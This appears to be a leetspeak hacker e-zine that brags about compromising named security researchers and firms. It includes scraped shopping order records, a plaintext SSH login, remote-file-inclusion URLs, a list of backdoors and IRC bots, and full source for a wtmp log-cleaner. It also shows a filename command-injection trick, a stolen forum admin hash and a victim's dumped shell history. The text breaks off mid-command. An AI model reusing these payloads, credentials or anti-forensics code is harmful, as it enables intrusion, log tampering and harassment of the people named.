Shipping Information Shipping Method Ground Weight=25 Ship to Name Marlene [edited] Ship to Address [edited] Ship City [edited] Ship State TN Ship Post Code [edited] Ship Country US Customer Information First Name Michael Last Name [edited] Address [edited] City [edited] State TX Post Code [edited] Country US Email [edited] Phone [edited] Payment Information Payment Type Visa Name on Card Michael [edited] Card Number [edited] Expiry Date mm/yy [edited] Card Holder Address [edited] Authorization CVN [edited] Shipping Information Shipping Method Ground Weight=15.2000000476837 Customer Information First Name Paula Last Name [edited] Address [edited] City [edited] State ME Post Code [edited] Country US Email [edited] Phone [edited] Payment Information Payment Type Visa Name on Card Paula [edited] Card Number [edited] Expiry Date mm/yy [edited] Card Holder Address [edited] Authorization CVN [edited] Shipping Information Shipping Method Ground Weight=8 konewka@olek:~/b0x$ cat m0d.txt 217.115.176.3 port - 22 proto - ssh user - bes pass - gbpltw ************** konewka@olek:~/b0x$ head -n2 matrix.txt http://vvmu.isot.ru/index.php?page=http://zerkalodeface.narod.ru/universal.php http://ezonet.ru/index.php?page=http://zerkalodeface.narod.ru/universal konewka@olek:~/b0x$ cd ../w0rkz konewka@olek:~/w0rkz$ ls eric-client.c evil.php kenny-smart.c mybindshell.c sesje.bash* eric.c kenny* log_clean.c priv8kenny.c tvn.c konewka@olek:~/w0rkz$ head -n6 eric.c /* ** eric.c - Fri May 12 2004 ** Linux backdoor with terminal support. ** Compile with -lutil flag. ** konewka/roSEC */ konewka@olek:~/w0rkz$ head -n5 eric-client.c /* ** eric-client.c - Fri May 12 2004 ** Simple client which connects to your eric backdoor ** konewka/roSEC */ konewka@olek:~/w0rkz$ head -n15 kenny-smart.c /* ** kenny.c by konewka ** ** Simple IRC bot, that can execute shell commands and print it out ** to you. With this bot you may execute shell commands with full anonymity, ** it's kind of connect back backdoor. ** ** It has been tested on IRCnet and EFnet IRC networks, and should ** compile without any problems on Linux and FreeBSD. ** ** If you want only one certain host to execute commands compile with ** -DMASTERONLY flag and change MASTER define. ** ** Fell free to add your functions, but keep my nickname in credits. */ konewka@olek:~/w0rkz$ cat log_clean.c #include #include #include #include #include int main(int argc, char *argv[]) { struct utmp ut; char user[] = "konewka", host[] = "konewka"; int f_in, f_out, ut_len; if ((f_in = open("/var/log/wtmp", O_RDONLY)) < 0) { printf("cant open\n"); return -1; } if ((f_out = open("wtmp", O_WRONLY|O_CREAT)) < 0) { printf("cant open to write\n"); return -1; } ut_len = sizeof(ut); while (read(f_in, &ut, ut_len) == ut_len) { if (!strncmp(ut.ut_user, user, strlen(user)) || !strncmp(ut.ut_host, host, strlen(host))) ; else write(f_out, &ut, ut_len); } close(f_out); close(f_in); return 0; } konewka@olek:~/w0rkz$ head -n5 mybindshell.c /* mybindshell.c coded by konewka (www.olek.org) * backdoor (bindshell) with password. * cleaned up code. * enjoy ! */ konewka@olek:~/w0rkz$ head -n39 priv8kenny.c /* ** priv8kenny.c by konewka ** ** Simple IRC bot, that can execute shell commands and print it out ** to you. With this bot you may execute shell commands with full anonymity, ** it's kind of connect back backdoor. ** ** It has been tested on IRCnet and EFnet IRC networks, and should ** compile without any problems on Linux and FreeBSD. ** ** Fell free to add your functions, but keep my nickname in credits. ** ** Few words about the usage, the best way is to take a look into source. ** Anyway, when bot successfuly joined our channel, you can: ** - Exec commands by !sh ** - Join/part channels by !part/!join <#channel_name> ** - Op/Deop users by !op/deop [user2] [user3] ** - Select random nick and then voice or kick him by !random voice/kick ** - To quit use !exit ** ** Changes: ** - Added next "war" option - mass deop (!mdeop) ** - Added mass kick - !mkick or !mkick noops to kick only users without op ** - Added simple userlist and kick protection on users (change users array) ** - Added timer in port_scan() and service display ** - Added ping reply while connecting on some irc servers (irc.0x333.org) ** - Added ctcp version reply ** - Added reconnect() ** - Added mass deop protection, on d4rkgr3y request :) ** - Added !scan - use !scan or ** - Added !script and !run that allow you to program your bot, e.g. ** !script mode #ch +i;privmsg #ch :haha :) and !run to execute instructions ** - Added !say - syntax should look like this !say :message text ** - Added !where to locate bot ** - Fixed bot.nick overwrite ** - Added !op and terrific random kick/voice - !random kick/voice. ** - Fixed process hide (port). ** - Fixed Since now errors from execution wont be printed to terminal. */ konewka@olek:~/w0rkz$ head -n8 tvn.c /* copyright (c) konewka * moje malenstwo do sprawdzania rozkladu jazdy na stacji TVN (uwielbiam wasza telewizje) * polecam uzywac razem z jakims edytorem strumieniowym, sed, awk (..) * PRZEGLADAC Z MORE'em ! :) * * Pozdrawiam Tomasza Lisa. * */ konewka@olek:~/w0rkz$ wh4t a h4q3r! th1z k1d w4st3z m0r3 t1m3 c0d1ng p01ntl3zz to0lz th4n synapze 0n th3 w33k3ndz h3 h4z c0k3. 02.txt -~-~-~ ri0t c0d3z ri0t m1lw0rmz m0r3 3xpl01tz th4n a h4q3d ES ftpd. h3z n0t g01ng t0 qu1t s3cur1ty c4uz3 h3'z g41n1ng m0r3 f4m3 th4n ph0bos & cold-fire fr0m t3chtv r3runz! 3xp0s3d 1n r3sp3ct4bl3 full d1zcl0sur3 f4zz10n. y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0 t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk. j4q:/Users/anybody/fuzz j4q$ echo '' > '`ls>abc`' j4q:/Users/anybody/fuzz j4q$ chmod 7777 '`ls>abc`' j4q:/Users/anybody/fuzz j4q$ su anybody Password: anybody:~/fuzz anybody$ wget http://www.ri0tnet.net/fuzzyri0t.tar.gz anybody:~/fuzz anybody$ tar -zxvf fuzzyri0t.tar.gz fuzzyri0t.pl anybody:~/fuzz anybody$ ls -al total 24 drwxrwxrwx 4 anybody 14790 136 Jul 24 04:09 . drwxrwxrwx 56 anybody 14790 1904 Jul 24 04:07 .. -rwsrwsrwt 1 j4q 14791 1 Jul 24 04:07 `ls>abc` -rw-r--r-- 1 anybody 14790 6618 Jul 24 04:08 fuzzyri0t.pl anybody:~/fuzz anybody$ perl fuzzyri0t.pl What task would you like to perform? [0] Input target program manualy. [1] Select target program from a list of all suid programs. [2] Display all world writeable files on the system. [3] Display all world writeable directories on the system. [4] Exit. Please input choice: 1 Finding all suid programs on the system this will only occur once please wait..... [0] /bin/df [1] /bin/ps [2] /bin/rcp [3] /dev/fd/3/`ls>abc` [4] /sbin/launchd [5] /sbin/mount_nfs [6] /sbin/mount_smbfs [7] /sbin/ping [8] /sbin/ping6 [9] /sbin/restore [10] /sbin/route [11] /sbin/rrestore [12] /sbin/umount [13] /Users/anybody/fuzz/`ls>abc` [14] /usr/bin/at [15] /usr/bin/atos [16] /usr/bin/atq [17] /usr/bin/atrm [18] /usr/bin/batch [19] /usr/bin/chfn [20] /usr/bin/chpass [21] /usr/bin/chsh [22] /usr/bin/crontab [23] /usr/bin/edit [24] /usr/bin/fetchmail [25] /usr/bin/heap [26] /usr/bin/leaks [27] /usr/bin/lockfile [28] /usr/bin/login [29] /usr/bin/lppasswd [30] /usr/bin/malloc_history [31] /usr/bin/nfsstat [32] /usr/bin/passwd [33] /usr/bin/procmail [34] /usr/bin/quota [35] /usr/bin/rlogin [36] /usr/bin/rsh [37] /usr/bin/sample [38] /usr/bin/setregion [39] /usr/bin/smbutil [40] /usr/bin/su [41] /usr/bin/sudo [42] /usr/bin/top [43] /usr/bin/vmmap [44] /usr/bin/wall [45] /usr/bin/write [46] /usr/sbin/lsof [47] /usr/sbin/netstat [48] /usr/sbin/postdrop [49] /usr/sbin/postqueue [50] /usr/sbin/pppd [51] /usr/sbin/screenreaderd [52] /usr/sbin/scselect [53] /usr/sbin/traceroute [54] /usr/sbin/traceroute6 [55] /usr/sbin/trpt [56] /usr/sbin/vpnd Please select desired target: 13 running program with no options to get usage settings. sh: line 1: /Users/anybody/fuzz/: is a directory Please input any optional switches you would like to use with the target program: Please select attack payload [0] Standard Buffer Overflow [1] Standard Format String [2] Custom Attack Payload [3] Main Menu Please input choice: 3 What task would you like to perform? [0] Input target program manualy. [1] Select target program from a list of all suid programs. [2] Display all world writeable files on the system. [3] Display all world writeable directories on the system. [4] Exit. Please input choice: 4 anybody:~/fuzz anybody$ ls -al total 32 drwxrwxrwx 5 anybody 14790 170 Jul 24 04:11 . drwxrwxrwx 56 anybody 14790 1904 Jul 24 04:07 .. -rwsrwsrwt 1 j4q 14791 1 Jul 24 04:07 `ls>abc` -rw-r--r-- 1 anybody 14790 26 Jul 24 04:11 abc -rw-r--r-- 1 anybody 14790 6619 Jul 24 04:11 fuzzyri0t.pl anybody:~/fuzz anybody$ th4nkz t0 0ur 0d4y 0SX p0rt 0f f1l3fuzz w3 w3r3 4bl3 t0 sp0t th1z s3cur1ty h0l3 (bd) b3f0r3 ri0t c0uld uz3 1t 4g41nst uz!@ f33l fr33 t0 us3 1t & m4k3 ri0t rm h1ms3lf. w3 w1ll tr4d3 4n 3xpl01t 4g41nztfuzzyri0t f0r a r3m0t3 psybnc 0r r3m0t3 cvs 0d4y. 3m41l dvdman@l33tsecurity.com t0 w0rk 0ut d3t41lz (s3nd pic@#$!). 03.txt -~-~-~ sabre-security az yu0 all kn0w, sabre-secur1ty releazes some el1te auditing t00lz. h4LvaR fl4ke iz a g3niuz but h3 k4nt s33m to sekure h1z shit w3ll... s0 w3 had t0 0wn hiz f0rumz!! i mean sh1t, wr1ting all th3ze sec t00lz iz r34lly h4rd 0r s0meth1ng & secur1ng a f0rum muzt be ev3n hard3r! http://www.sabre-security.com/forum/simpleforum_files/forum_01/forum.info SABRE BinDiff Discussions of SABRE BinDiff, binary diffing and IDB migration in general SiawRaNQeVgkI normal http://www.sabre-security.com/forum/simpleforum_files/forum_02/forum.info SABRE BinNavi Discussions of SABRE BinNavi, graph-based debugging and input crafting SifafLvA6kS8o normal http://www.sabre-security.com/forum/simpleforum_files/forum_03/forum.info SABRE BinAudit Discussions of SABRE BinAudit, automated static analysis of executables, dataflow analysis SiJQ4YtHtAqFE normal http://www.sabre-security.com/forum/simpleforum_files/forum_04/forum.info General RE General discussion of matter related to binary analysis Si/QbwJMRBLNs normal http://www.sabre-security.com/forum/simpleforum_files/simpleforum.conf wh0a d00dz, s1nce wh3n are sekur1ty pr0fessi0nalz supp0z3d t0 leav3 their syst3mz open th1z wide?@ admin_password:SiD7JOBQAe6Y2 images_dir:simpleforum_files/images h3y skew, if yu0'r3 read1ng th1z sh1t, n0w iz th3 tim3 t0 sshbrute th3 fuq outta the s3rv3r. 0h and mak3 sur3 y0u craq th3ze. w3 are n0t capabl3 0f such elite taskz. h4r h4r h4r!@!($@# title:SABRE Security User Forum home_name:Home home_url:http://www.sabre-security.com/content.html hour_difference:0 hoursystem:12 date_notation:ddmmyy html_protection:on bbcode:on smileys:on author_edit:on backgroundcolor:#FFFFFF backgroundimage:simpleforum_files/images/background.gif tablecolor1:#E9E6E6 tablecolor2:#D8D7D7 tablecolor3:#F8F7F7 tablebordercolor:#555555 tablewidth:93% postformbackground:#E9E6E6 fontface:verdana,arial fontsize:9 fontsizesmall:8 fontcolor:#555555 topics_per_page:10 posts_per_page:20 popularnumb:15 link_color:#E27153 visited_link_color:#E27153 link_hover_color:#CC6666 language:English mail:off admin_email: mailprog:/usr/sbin/sendmail admin_email_notify:off show_email_addresses:off attachments_dir:simpleforum_files/attachments attachments_url:simpleforum_files/attachments allow_attachments:yes attachments_uploadmax:1024000 m4ybe y0u fuck3rz sh0uld BinNavi y0ur 0wn CGI, h4 h4r h4r!! w3've alw33z want3d t0 be devel0perz f0r sabre BinNavi, and eye th1nk luQ sh1ned d0wn up0n uz: halvar.flake ***.**.***.** halvar.flake@sabre-security.com Welcome ... ... if you can read this, you're a developer for SABRE BinNavi :-) S�.ren Meyer-Eppler **.***.***.*** soeren.meyer-eppler@BuschnicK.net Re: Welcome ... that I am I guess ;-) halvar, y0u muzt 4dd 'h0no' to ur lizt 0f develop3rz, y0u w1ll appreciat3 0ur c0ntributi0n t0 y0ur sekur1ty f1rm! Halvar Flake **.***.***.** halvar.flake@sabre-security.com SABRE BinNavi beta testers Hey all, we're looking for 1-2 adventurous customers that would like to try out the beta version of SABRE BinNavi for a bit. Any volunteers ? :) Cheers, Halvar -~-~-~ h0no 4lr34dy h4z B1nN4v1 b3t4. full 0f fmtstr1ng bugz. -~-~-~ Dennis **.***.***.*** Re: SABRE BinNavi beta testers Sure, I'd definately be interested! Should I contact you by email ? ;-) -~-~-~ y3z, h0p3fully a f3ll0w #darknet m3mb3r h4z 1t sn1ff3d. -~-~-~ Halvar Flake **.***.***.** halvar.flake@sabre-security.com Re: SABRE BinNavi beta testers Yes please :-) Dennis **.***.***.*** Re: SABRE BinNavi beta testers Thanks for the beta, HalVar! I really like this product and I'll definately purchase a BinNavi license! I'm looking forward to it! -~-~-~ st0p kiss1ng ass, Dennis! w3 n33d this m0re than y0u!@$ ps. Dennis, it'z 4 tr0j4n. -~-~-~ halvar.flake ***.**.***.** halvar.flake@sabre-security.com If you can read this ... ... I gave you a password -~-~-~ th4nkz a l0t f0r th1z go0dz!@# -~-~-~ 0mg, halvar, w3 are y0ur b3st fanz. eye th1nk w3 des3rve a BinNavi license! p3rhapz y0u c0uld h00k uz up w1th s0me mad BinNavi w4r3z??! k33p up the gr8 w0rk, sabre-secur1ty. y0u are 0ur id0lz. btw, az a fri3ndly h0no suggezti0n (w3 are fri3ndz r1ght?), m4ybe y0u sh0uld B1nN4v1 y0ur 0wn k0d3Z? s0rry f0r br1nging thiz extr3m3ly m1nd-numb1ng c0nc3pt up, but wh4tz up w1th th1z sh1T?!$@ c0ngr4tz g0 0ut t0 S�.ren Meyer-Eppler f0r m4k1ng 1t az a n3w BinNav1 dEvElop3r!@$$ m4y y0u kiss a l0t 0f k4lvar ass. (w3 ar3 fuqn j3al0us) -- h0no n0ticed th4t sabre-security haz n0 sl0gan. if y0u are g0ing int0 the bizn3zz w0rld, y0u've g0tta have 0ne!!@ az a g3stur3 0f k1ndnezz, w3 h4v3 th0ught 0f 0ne f0r y0u! y0u will uz3 it!! "SABRE Security - W3 f0rg0t t0 uZe BinAud1t 0n 0urSeLv3z!" truzt us. 1t w1ll w0rk l1k3 nutz. -- f0r aLL y0u BinNavi l0v3rz, h0no haz put t0g3ther a sp3cial k0nt3zt f0r y0u. HOW TO WIN A COPY OF BINNAVI 0DAY W4R3Z! - s3nd an e-m41L t0 Halvar expla1ning h0w much 0f a f4gg0t h3 1z. wh03ver s3ndz th3 b3zt e-m4iL t0 h1m g3tz a PHR33 C0PY 0F BINNAVI W1TH A SP3CIAL HALVAR FLAKE AUTOGR4PH. th3 c0nt3zt h4z 4lr34dy 3nd3d. dvdm4n w0n. 04.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 1 l0r14n sur3 1z c0nf1d3nt th4t th3 b0x3z h3 sshz fr0m r s3cur3. t43m d34d3nd-php, s3cur3!@$@# (root@c0mp) (/owned/bitchez/) # ssh cf.sourceforge.net -lsesser sesser@cf.sourceforge.net's password: Pdmenu +-------------Choose compile farm server...--------------+ ¶ Exit ¶ ¶ Z. CompileFarm ShellServer (CentOS 4.2, x86) ¶ ¶ ¶ ¶ Complete instructions on using the Compile Farm ¶ ¶ are available at: http://sf.net/docs/E02/ ¶ ¶ ¶ ¶ Compile Farm status information available at ¶ ¶ http://sf.net/docs/A05/ ¶ ¶ ¶ ¶ A. [x86] Linux 2.4 (Debian 2.2) ¶ ¶ B. [x86] Linux 2.6 (Fedora FC2) ¶ ¶ ¶ ¶ C. [x86] FreeBSD (4.8) ¶ ¶ D. [x86] NetBSD (1.6.1) ¶ ¶ ¶ ¶ E. [AMD64] Linux 2.6 (Fedora Core 3 on AMD64 Opteron) ¶ ¶ F. [AMD64] Linux 2.6 (Fedora Core 3 on AMD64 Opteron) ¶ ¶ ¶ ¶ G. [Alpha] Linux 2.2 (Debian 3.0) ¶ ¶ ¶ +--------------------------------------------------------+ Welcome to Pdmenu 1.2.85 by Joey Hess Last login: Sun Dec 18 12:43:48 2005 from login.cf.sourceforge.net Welcome to the SourceForge CompileFarm Shellserver. This host provides a centralized point of access for receiving e-mail generated by other compile farm hosts (i.e. cron job results). From the Compile Farm Shell Server, mail may be forwarded to, or be generated to, SourceForge.net user accounts (username@users.sourceforge.net) and SourceForge.net project mailing lists (projectname-listname@lists.sourceforge.net). Cron jobs may also be scheduled on the Compile Farm shell server, as to perform automated clean-up of build directories, etc. As of 2004-01-14, you may now SSH (and SCP, SFTP, rsync over SSH) directly to this Compile Farm shell server. Information may be found in the Compile Farm guide (URL below). This host may connect to other Compile Farm hosts using 'ssh' to the hostnames in: /etc/compilefarm-hosts A NEW AND IMPROVED guide to the Compile Farm is now available (updated 2004-10-12) at: https://sourceforge.net/docs/E02/ -bash-3.00$ ls -al total 1660 drwxr-xr-x 7 sesser users 4096 Dec 11 13:58 . drwxr-xr-x 42 root root 4096 Nov 29 06:20 .. -rw------- 1 sesser users 19384 Nov 30 04:41 .bash_history drwx------ 2 sesser users 4096 Dec 5 2004 .cedit -rw------- 1 sesser users 131584 Dec 9 2004 core -rw-r--r-- 1 sesser users 503393 Oct 25 07:24 hardening-patch-4.4.0-0.4.3.patch -rw------- 1 sesser users 19384 Dec 3 11:09 homebas -rw------- 1 sesser users 19384 Dec 3 11:09 homebase -rwxr-xr-x 1 sesser users 800464 Nov 30 04:37 libc.so.1 drwxr-xr-x 3 sesser users 4096 Dec 6 2004 .mc -rwxr-xr-x 1 sesser users 4683 Dec 13 2004 p -rw-r--r-- 1 sesser users 204 Dec 13 2004 p.c drwxr-xr-x 17 sesser users 4096 Oct 28 01:59 php-4.4.0 -rw-r--r-- 1 sesser users 664 Dec 9 2004 sparc.o -rw-r--r-- 1 sesser users 72 Dec 9 2004 sparc.s drwxr-xr-x 2 sesser users 4096 Oct 31 23:33 .ssh -rwxr-xr-x 1 sesser users 9032 Dec 9 2004 t -rw-r--r-- 1 sesser users 99 Dec 9 2004 t.c -rw-r--r-- 1 sesser users 725 Dec 6 2004 test.o -rw-r--r-- 1 sesser users 228 Dec 6 2004 test.s -rwxr-xr-x 1 sesser users 9324 Nov 27 09:37 tmp -rwxr-xr-x 1 sesser users 6748 Nov 30 04:34 tmp2 -rwxr-xr-x 1 sesser users 6624 Nov 30 04:36 tmp3 -rw-r--r-- 1 sesser users 278 Nov 30 04:34 tmp.c -rw------- 1 sesser users 6736 Nov 27 09:36 .viminfo drwx------ 2 sesser users 4096 Jun 15 2004 .w3m -rwxr-xr-x 1 sesser users 13411 Dec 5 2004 x -rwxr-xr-x 1 sesser users 8975 Dec 5 2004 x_alpha -rw-r--r-- 1 sesser users 1003 Dec 5 2004 x.c -rwxr-xr-x 1 sesser users 9544 Dec 5 2004 x_ppc -rw-r--r-- 1 sesser users 1033 Dec 13 2004 xpx -rwxr-xr-x 1 sesser users 6548 Dec 5 2004 x_sparc -rwxr-xr-x 1 sesser users 8976 Dec 5 2004 x_sparcv9 -bash-3.00$ cat .bash_history make mc exit PROMPT_COMMAND='pwd>&7;kill -STOP $$' cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`" PROMPT_COMMAND='pwd>&7;kill -STOP $$' cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\157\144\165\154\145\163'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" PROMPT_COMMAND='pwd>&7;kill -STOP $$' cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164\057\143\164\171\160\145'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`" PROMPT_COMMAND='pwd>&7;kill -STOP $$' cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" ./config.nice PROMPT_COMMAND='pwd>&7;kill -STOP $$' cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`" vi test.s gcc -c test.s objdump --disassemble test.o cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\151\156\143\154\165\144\145'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" vi test.php gdb php gdb pgp gdb php gdb ./php gdb pgp gdb ./php php test.php ./php test.php PROMPT_COMMAND='pwd>&7;kill -STOP $$' cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" ./php test.php gdb ./php ./php test.php gdb ./php cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" make cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" ./php test.php ./php test.php > yyyy cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" make cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" ./php test.php > yyyy cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e 